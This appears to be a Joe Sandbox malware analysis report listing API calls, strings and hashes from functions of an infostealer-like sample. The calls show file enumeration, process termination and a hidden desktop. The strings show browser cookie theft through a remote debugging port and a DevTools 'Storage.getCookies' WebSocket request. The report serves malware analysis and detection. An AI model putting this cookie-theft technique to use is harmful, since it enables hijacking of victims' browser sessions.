                          • Opcode ID: d1ebc0b03bc1a70ed24d88d3639a10541b81b22f87524029f7d51338c4dfe8b4
                          • Instruction ID: 3879e7927f552356bdcbfc4e20a94de6433b32a7a5233e2dfab2ee42d0cba7c8
                          • Opcode Fuzzy Hash: d1ebc0b03bc1a70ed24d88d3639a10541b81b22f87524029f7d51338c4dfe8b4
                          • Instruction Fuzzy Hash: 45C18276A002599FDB61DFA4DC49AEE7779FF88300F004599F909A7281DE38AE46CF50
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E1291
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E12B4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E12BF
                          • lstrlen.KERNEL32(00804CA8), ref: 007E12CA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E12E7
                          • lstrcat.KERNEL32(00000000,00804CA8), ref: 007E12F3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E131E
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 007E133A
                          • StrCmpCA.SHLWAPI(?,008017A0), ref: 007E135C
                          • StrCmpCA.SHLWAPI(?,008017A4), ref: 007E1376
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E13AF
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E13D7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E13E2
                          • lstrlen.KERNEL32(00801794), ref: 007E13ED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E140A
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E1416
                          • lstrlen.KERNEL32(?), ref: 007E1423
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1443
                          • lstrcat.KERNEL32(00000000,?), ref: 007E1451
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E147A
                          • StrCmpCA.SHLWAPI(?,0125D598), ref: 007E14A3
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E14E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E150D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1535
                          • StrCmpCA.SHLWAPI(?,0125DCF0), ref: 007E1552
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E1593
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E15BC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E15E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E1796
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E17BE
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E17F5
                          • FindNextFileA.KERNEL32(00000000,?), ref: 007E181C
                          • FindClose.KERNEL32(00000000), ref: 007E182B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                          • String ID:
                          • API String ID: 1346933759-0
                          • Opcode ID: d5fdb3458e184952cb72fa30d92ad9cb2d6a922bd95c3cda5ba735b44dea2fea
                          • Instruction ID: b4dfa409ee291a3957b5543036d174ab20035aa99f9ad20529207d2435fab13e
                          • Opcode Fuzzy Hash: d5fdb3458e184952cb72fa30d92ad9cb2d6a922bd95c3cda5ba735b44dea2fea
                          • Instruction Fuzzy Hash: F1C19471A1125A9BDB21EF75DC4AAAF77B8AF58300F444129F846E7352DB38DC038B90
                          APIs
                          • memset.MSVCRT ref: 007D9790
                          • lstrcat.KERNEL32(?,?), ref: 007D97A0
                          • lstrcat.KERNEL32(?,?), ref: 007D97B1
                          • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 007D97C3
                          • memset.MSVCRT ref: 007D97D7
                            • Part of subcall function 007F3E70: lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007F3EA5
                            • Part of subcall function 007F3E70: lstrcpy.KERNEL32(00000000,0125A4D0), ref: 007F3ECF
                            • Part of subcall function 007F3E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,007D134E,?,0000001A), ref: 007F3ED9
                          • wsprintfA.USER32 ref: 007D9806
                          • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 007D9827
                          • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 007D9844
                            • Part of subcall function 007F46A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 007F46B9
                            • Part of subcall function 007F46A0: Process32First.KERNEL32(00000000,00000128), ref: 007F46C9
                            • Part of subcall function 007F46A0: Process32Next.KERNEL32(00000000,00000128), ref: 007F46DB
                            • Part of subcall function 007F46A0: StrCmpCA.SHLWAPI(?,?), ref: 007F46ED
                            • Part of subcall function 007F46A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 007F4702
                            • Part of subcall function 007F46A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 007F4711
                            • Part of subcall function 007F46A0: CloseHandle.KERNEL32(00000000), ref: 007F4718
                            • Part of subcall function 007F46A0: Process32Next.KERNEL32(00000000,00000128), ref: 007F4726
                            • Part of subcall function 007F46A0: CloseHandle.KERNEL32(00000000), ref: 007F4731
                          • lstrcat.KERNEL32(00000000,?), ref: 007D9878
                          • lstrcat.KERNEL32(00000000,?), ref: 007D9889
                          • lstrcat.KERNEL32(00000000,00804B60), ref: 007D989B
                          • memset.MSVCRT ref: 007D98AF
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 007D98D4
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D9903
                          • StrStrA.SHLWAPI(00000000,0125E1D8), ref: 007D9919
                          • lstrcpyn.KERNEL32(00A093D0,00000000,00000000), ref: 007D9938
                          • lstrlen.KERNEL32(?), ref: 007D994B
                          • wsprintfA.USER32 ref: 007D995B
                          • lstrcpy.KERNEL32(?,00000000), ref: 007D9971
                          • Sleep.KERNEL32(00001388), ref: 007D99E7
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D1557
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D1579
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D159B
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D15FF
                            • Part of subcall function 007D92B0: strlen.MSVCRT ref: 007D92E1
                            • Part of subcall function 007D92B0: strlen.MSVCRT ref: 007D92FA
                            • Part of subcall function 007D92B0: strlen.MSVCRT ref: 007D9399
                            • Part of subcall function 007D92B0: strlen.MSVCRT ref: 007D93E6
                            • Part of subcall function 007F4740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 007F4759
                            • Part of subcall function 007F4740: Process32First.KERNEL32(00000000,00000128), ref: 007F4769
                            • Part of subcall function 007F4740: Process32Next.KERNEL32(00000000,00000128), ref: 007F477B
                            • Part of subcall function 007F4740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 007F479C
                            • Part of subcall function 007F4740: TerminateProcess.KERNEL32(00000000,00000000), ref: 007F47AB
                            • Part of subcall function 007F4740: CloseHandle.KERNEL32(00000000), ref: 007F47B2
                            • Part of subcall function 007F4740: Process32Next.KERNEL32(00000000,00000128), ref: 007F47C0
                            • Part of subcall function 007F4740: CloseHandle.KERNEL32(00000000), ref: 007F47CB
                          • CloseDesktop.USER32(?), ref: 007D9A1C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                          • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                          • API String ID: 958055206-1862457068
                          • Opcode ID: 496be3258a36c11d9f4c3fd480b4f9d9f99f0f31c4d831e67af45f79d6d08374
                          • Instruction ID: 49716f8d442e25fe1799cba633c07f77c19d4142a662ca290c16e6784314e9ee
                          • Opcode Fuzzy Hash: 496be3258a36c11d9f4c3fd480b4f9d9f99f0f31c4d831e67af45f79d6d08374
                          • Instruction Fuzzy Hash: D8917471A40218EBDB10DFB4DC49FEE77B8EF48700F108159F609A7291DE74AA46CBA4
                          APIs
                          • wsprintfA.USER32 ref: 007EE22C
                          • FindFirstFileA.KERNEL32(?,?), ref: 007EE243
                          • StrCmpCA.SHLWAPI(?,008017A0), ref: 007EE263
                          • StrCmpCA.SHLWAPI(?,008017A4), ref: 007EE27D
                          • wsprintfA.USER32 ref: 007EE2A2
                          • StrCmpCA.SHLWAPI(?,007FCFEC), ref: 007EE2B4
                          • wsprintfA.USER32 ref: 007EE2D1
                            • Part of subcall function 007EEDE0: lstrcpy.KERNEL32(00000000,?), ref: 007EEE12
                          • wsprintfA.USER32 ref: 007EE2F0
                          • PathMatchSpecA.SHLWAPI(?,?), ref: 007EE304
                          • lstrcat.KERNEL32(?,0125E998), ref: 007EE335
                          • lstrcat.KERNEL32(?,00801794), ref: 007EE347
                          • lstrcat.KERNEL32(?,?), ref: 007EE358
                          • lstrcat.KERNEL32(?,00801794), ref: 007EE36A
                          • lstrcat.KERNEL32(?,?), ref: 007EE37E
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 007EE394
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EE3D2
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EE422
                          • DeleteFileA.KERNEL32(?), ref: 007EE45C
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D1557
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D1579
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D159B
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D15FF
                          • FindNextFileA.KERNEL32(00000000,?), ref: 007EE49B
                          • FindClose.KERNEL32(00000000), ref: 007EE4AA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                          • String ID: %s\%s$%s\*
                          • API String ID: 1375681507-2848263008
                          • Opcode ID: ebe313a9ad436a3dbd4e14d909e3449223731e91cdc80d9fd8485b3c321a51f1
                          • Instruction ID: 2a57ba1bac116e4dbf80273450205d83eb00aadeae3d07c214f07e7eec5108ae
                          • Opcode Fuzzy Hash: ebe313a9ad436a3dbd4e14d909e3449223731e91cdc80d9fd8485b3c321a51f1
                          • Instruction Fuzzy Hash: FA81717190025D9BCB20EFB5DC49AEF7779FF48300F008999B55A93291DB39AA46CF90
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D16E2
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D1719
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D176C
                          • lstrcat.KERNEL32(00000000), ref: 007D1776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D17A2
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D18F3
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D18FE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat
                          • String ID: \*.*
                          • API String ID: 2276651480-1173974218
                          • Opcode ID: e469c42eb758dcb635e4a730e04b9f841d730c0604d7c789aac9e6c925bebfb9
                          • Instruction ID: 5a86a79e56a9559f55f47056957403b57abdda9009286b8d98a67e30c2b49d9e
                          • Opcode Fuzzy Hash: e469c42eb758dcb635e4a730e04b9f841d730c0604d7c789aac9e6c925bebfb9
                          • Instruction Fuzzy Hash: A881633191121AEBCB21EFA4DD99AAF77B9EF54300F445126F805A7352DB38AD03CB91
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 007EDD45
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007EDD4C
                          • wsprintfA.USER32 ref: 007EDD62
                          • FindFirstFileA.KERNEL32(?,?), ref: 007EDD79
                          • StrCmpCA.SHLWAPI(?,008017A0), ref: 007EDD9C
                          • StrCmpCA.SHLWAPI(?,008017A4), ref: 007EDDB6
                          • wsprintfA.USER32 ref: 007EDDD4
                          • DeleteFileA.KERNEL32(?), ref: 007EDE20
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 007EDDED
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D1557
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D1579
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D159B
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D15FF
                            • Part of subcall function 007ED980: memset.MSVCRT ref: 007ED9A1
                            • Part of subcall function 007ED980: memset.MSVCRT ref: 007ED9B3
                            • Part of subcall function 007ED980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007ED9DB
                            • Part of subcall function 007ED980: lstrcpy.KERNEL32(00000000,?), ref: 007EDA0E
                            • Part of subcall function 007ED980: lstrcat.KERNEL32(?,00000000), ref: 007EDA1C
                            • Part of subcall function 007ED980: lstrcat.KERNEL32(?,0125E2B0), ref: 007EDA36
                            • Part of subcall function 007ED980: lstrcat.KERNEL32(?,?), ref: 007EDA4A
                            • Part of subcall function 007ED980: lstrcat.KERNEL32(?,0125D6A0), ref: 007EDA5E
                            • Part of subcall function 007ED980: lstrcpy.KERNEL32(00000000,?), ref: 007EDA8E
                            • Part of subcall function 007ED980: GetFileAttributesA.KERNEL32(00000000), ref: 007EDA95
                          • FindNextFileA.KERNEL32(00000000,?), ref: 007EDE2E
                          • FindClose.KERNEL32(00000000), ref: 007EDE3D
                          • lstrcat.KERNEL32(?,0125E998), ref: 007EDE66
                          • lstrcat.KERNEL32(?,0125DDD0), ref: 007EDE7A
                          • lstrlen.KERNEL32(?), ref: 007EDE84
                          • lstrlen.KERNEL32(?), ref: 007EDE92
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EDED2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                          • String ID: %s\%s$%s\*
                          • API String ID: 4184593125-2848263008
                          • Opcode ID: 8a78d9b1d4f3db1d0e402138640e6fc17b5dad52d178e5d0154b3010da7f3a00
                          • Instruction ID: 2f608779bc544fa7d5621b4e437fec0855124b71e4843989b060c7ffa487e505
                          • Opcode Fuzzy Hash: 8a78d9b1d4f3db1d0e402138640e6fc17b5dad52d178e5d0154b3010da7f3a00
                          • Instruction Fuzzy Hash: 12612171910219ABCB20EFB4DC49AEE77B9FF98300F0045A9B945E7251DB38AE56CB50
                          APIs
                          • wsprintfA.USER32 ref: 007ED54D
                          • FindFirstFileA.KERNEL32(?,?), ref: 007ED564
                          • StrCmpCA.SHLWAPI(?,008017A0), ref: 007ED584
                          • StrCmpCA.SHLWAPI(?,008017A4), ref: 007ED59E
                          • lstrcat.KERNEL32(?,0125E998), ref: 007ED5E3
                          • lstrcat.KERNEL32(?,0125EA68), ref: 007ED5F7
                          • lstrcat.KERNEL32(?,?), ref: 007ED60B
                          • lstrcat.KERNEL32(?,?), ref: 007ED61C
                          • lstrcat.KERNEL32(?,00801794), ref: 007ED62E
                          • lstrcat.KERNEL32(?,?), ref: 007ED642
                          • lstrcpy.KERNEL32(00000000,?), ref: 007ED682
                          • lstrcpy.KERNEL32(00000000,?), ref: 007ED6D2
                          • FindNextFileA.KERNEL32(00000000,?), ref: 007ED737
                          • FindClose.KERNEL32(00000000), ref: 007ED746
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 50252434-4073750446
                          • Opcode ID: ec2c030f565145f2eeab2f862ada0f98c427ab6ff7f352f2bfb9bc4d50905088
                          • Instruction ID: cc86a69aec5f95d0ed05717a960c1565e2de962e62272bab3a022acd33e711d6
                          • Opcode Fuzzy Hash: ec2c030f565145f2eeab2f862ada0f98c427ab6ff7f352f2bfb9bc4d50905088
                          • Instruction Fuzzy Hash: 916154719101199BDF20EFB4DC88ADE77B8EF58300F0085A5EA59A7351DB38AE46CF90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                          • API String ID: 909987262-758292691
                          • Opcode ID: 8112e7c444b8cf2aee27c097680808b390b4b45d6d5a732a649071425be993f4
